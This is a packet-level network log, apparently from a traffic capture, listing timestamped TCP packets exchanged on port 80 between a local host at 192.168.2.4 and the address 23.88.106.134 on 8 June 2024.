Jun 8, 2024 20:22:07.047363043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047386885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047405005 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047419071 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047434092 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047454119 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047473907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047486067 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047497034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047533035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047535896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047568083 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047584057 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047600031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047621012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047632933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047642946 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047667027 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047687054 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047699928 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047709942 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047734022 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047751904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047769070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047789097 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047801971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047808886 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047849894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047853947 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047887087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047902107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047919989 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047944069 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047960043 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.047966003 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.047992945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048011065 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048027992 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048048973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048062086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048074961 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048095942 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048110008 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048130035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048146009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048163891 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048182011 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048197031 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048211098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048230886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048245907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048264980 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048283100 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048304081 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048312902 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048337936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048356056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048369884 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048378944 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048404932 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048419952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048440933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048454046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048491955 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048530102 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048564911 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048579931 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048598051 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048610926 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048631907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048645973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048666000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048686028 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048700094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048715115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048733950 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048748970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048768997 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048789024 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048794985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048810959 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048815012 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048826933 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048840046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048840046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048844099 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048860073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048860073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048876047 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048886061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048893929 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048896074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048909903 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048918009 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048926115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048933029 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048942089 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048953056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048959017 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048963070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048976898 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.048976898 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.048995972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049000025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049011946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049021006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049027920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049030066 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049045086 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049047947 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049062014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049069881 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049077988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049078941 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049093962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049096107 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049112082 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049113989 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049128056 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049135923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049144983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049151897 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049169064 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049174070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049185038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049201012 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049202919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049202919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049217939 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049220085 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049236059 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049242973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049252033 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049272060 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049397945 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049415112 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049428940 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049439907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049453974 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049458027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049468994 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049468994 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049485922 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049495935 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049503088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049504995 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049519062 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049521923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049535036 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049542904 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049551010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049565077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049566984 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049576044 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049583912 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049597025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049597025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049599886 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049616098 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049616098 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049632072 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049639940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049649000 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049660921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049664021 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049671888 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049683094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049693108 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049698114 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049700975 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049714088 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049725056 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049731016 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049747944 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.049752951 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049763918 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.049789906 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050005913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050021887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050036907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050046921 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050052881 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050062895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050069094 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050081968 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050098896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050107956 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050148010 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050172091 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050189018 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050189018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050204039 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050215006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050215006 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050221920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050237894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050246954 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050252914 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050266027 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050271034 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050280094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050292969 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050295115 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050303936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050312996 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050327063 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050337076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050343037 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050354958 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050359964 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050373077 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050381899 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050385952 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050396919 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050399065 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050416946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050421000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050432920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050440073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050450087 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050458908 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050465107 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050476074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050476074 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050482035 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050498009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050509930 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050514936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050532103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.050532103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050540924 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050566912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.050575018 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051064014 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051079988 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051095009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051109076 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051110983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051126957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051129103 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051140070 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051143885 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051151991 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051160097 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051162004 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051181078 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051182985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051201105 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051208973 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051223993 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051228046 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051240921 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051245928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051256895 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051270962 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051274061 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051286936 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051302910 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051312923 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051317930 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051331043 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051335096 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051342010 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051351070 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051359892 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051367998 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051369905 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051383972 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051388025 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051398993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051399946 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051415920 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051423073 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051431894 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051433086 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051455021 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051465034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051723957 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051747084 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051763058 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051767111 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051775932 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051779985 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051796913 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051800966 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051812887 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051820993 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051831007 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051832914 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051846981 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051855087 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051875114 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051929951 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051944971 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051959038 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051964045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051964045 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051978111 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.051991940 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.051992893 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052002907 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052011013 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052014112 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052026987 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052035093 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052043915 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052053928 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052059889 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052064896 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052078009 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052086115 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052093983 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052094936 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052112103 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052119970 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052128077 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052134037 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052145004 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052146912 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052160978 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052166939 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052177906 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052180052 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052196026 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052203894 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052212000 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052213907 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052231073 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052237034 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052246094 CEST	49731	80	192.168.2.4	23.88.106.134
Jun 8, 2024 20:22:07.052248955 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052265882 CEST	80	49731	23.88.106.134	192.168.2.4
Jun 8, 2024 20:22:07.052268028 CEST	49731	80	192.168.2.4	23.88.106.134
